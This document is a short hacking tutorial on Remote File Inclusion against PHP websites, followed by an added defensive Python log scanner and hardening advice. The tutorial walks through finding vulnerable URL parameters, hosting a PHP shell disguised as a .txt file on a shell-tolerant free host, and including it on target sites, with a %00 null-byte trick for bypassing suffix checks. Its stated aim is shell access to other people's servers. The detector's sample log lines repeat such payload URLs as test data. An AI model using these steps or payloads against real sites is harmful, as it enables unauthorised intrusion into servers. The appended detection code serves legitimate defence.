Remote File Inclusion (RFI) is a common attack that allows an attacker to include a script from another website, often a PHP shell script, to gain shell access to the target server and compromise it further. A site is vulnerable when the include in a PHP script isn't declared correctly. In this tutorial I will be showing how a Remote File Inclusion attack is carried out.
Step 1
When looking for a Remote File Inclusion vulnerability in a website, you have to find a page that ends in something=4 or something=[string]. For example www.site.com/page=5
Alternatively, if you are carrying out an RFI from a prewritten exploit, you will be given the variable at the end of the URL, so you don't have to look yourself.
Step 2
Register a free web hosting account to upload your shell to. I recommend http://www.7host.com as it's fast, free and they allow you to upload shells without closing your account. IMPORTANT: Upload your file as a .txt file rather than .php or the attack will not work.
Step 3
Once you have successfully uploaded your shell, simply add it to the end of the URL after the = sign. For example: www.site.com/page=http://username.7host ... script.txt Your shell script should now be working as if it were a PHP file and the RFI attack has been successful.
Step 4
In this section we will be showing an advanced technique to bypass PHP filters. Some scripts contain this bit of code: include $page.'.php'; As you can see, it requires .php on the end of the URL. You may think you can simply upload the shell as a .php file and it will work, but this will instead come up as an error page, so do the same as before with a .txt shell script, but add a null byte, %00, to the end of the URL. For example: www.site.com/page=www.username.7host/shellscript.txt%00 This will be successful and show your shell link because it tells the browser to stop reading after the null byte.
Tutorial written by Xinapse at Firewire-Security.com. I do not give permission to copy this without PMing me first.
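On the defending side, the requests described in the steps above leave a recognizable trace in web server access logs: a query parameter whose value is a remote URL, sometimes ending in %00. The following is an added example, not part of the original tutorial, that flags both patterns. The log lines, host names and function names are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Request line of a common/combined-format access log entry.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Parameter value that begins with a remote scheme.
REMOTE_RE = re.compile(r'^\s*(?:https?|ftp)://', re.IGNORECASE)

def fully_decode(value, rounds=3):
    """Percent-decode repeatedly so double-encoded input (%2500) is also seen."""
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def rfi_indicators(log_line):
    """Return a list of (parameter, reason) findings for one access-log line."""
    match = REQUEST_RE.search(log_line)
    if not match:
        return []
    _, _, query = match.group(1).partition('?')
    findings = []
    for pair in query.split('&'):
        name, _, raw = pair.partition('=')
        value = fully_decode(raw)
        if REMOTE_RE.match(value):
            findings.append((name, 'remote URL in parameter'))
        if '\x00' in value:
            findings.append((name, 'null byte in parameter'))
    return findings

# Constructed sample lines (documentation IP range, reserved .test domain).
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Oct/2023:13:55:36 +0000] "GET /index.php?page=5 HTTP/1.1" 200 512',
    '203.0.113.9 - - [10/Oct/2023:13:56:01 +0000] '
    '"GET /index.php?page=http://files.example.test/script.txt HTTP/1.1" 200 90',
    '203.0.113.9 - - [10/Oct/2023:13:56:40 +0000] '
    '"GET /index.php?page=http%3A%2F%2Ffiles.example.test%2Fscript.txt%2500 HTTP/1.1" 200 90',
]

if __name__ == '__main__':
    for line in SAMPLE_LOG:
        for param, reason in rfi_indicators(line):
            print(f'{reason}: {param} <- {line.split()[0]}')
```

A hit is a lead to triage, not proof of compromise, since redirect-style parameters can legitimately carry URLs. The fix itself belongs in the application: map the parameter to an allowlist of local files instead of passing it to include, and keep the allow_url_include setting in php.ini disabled.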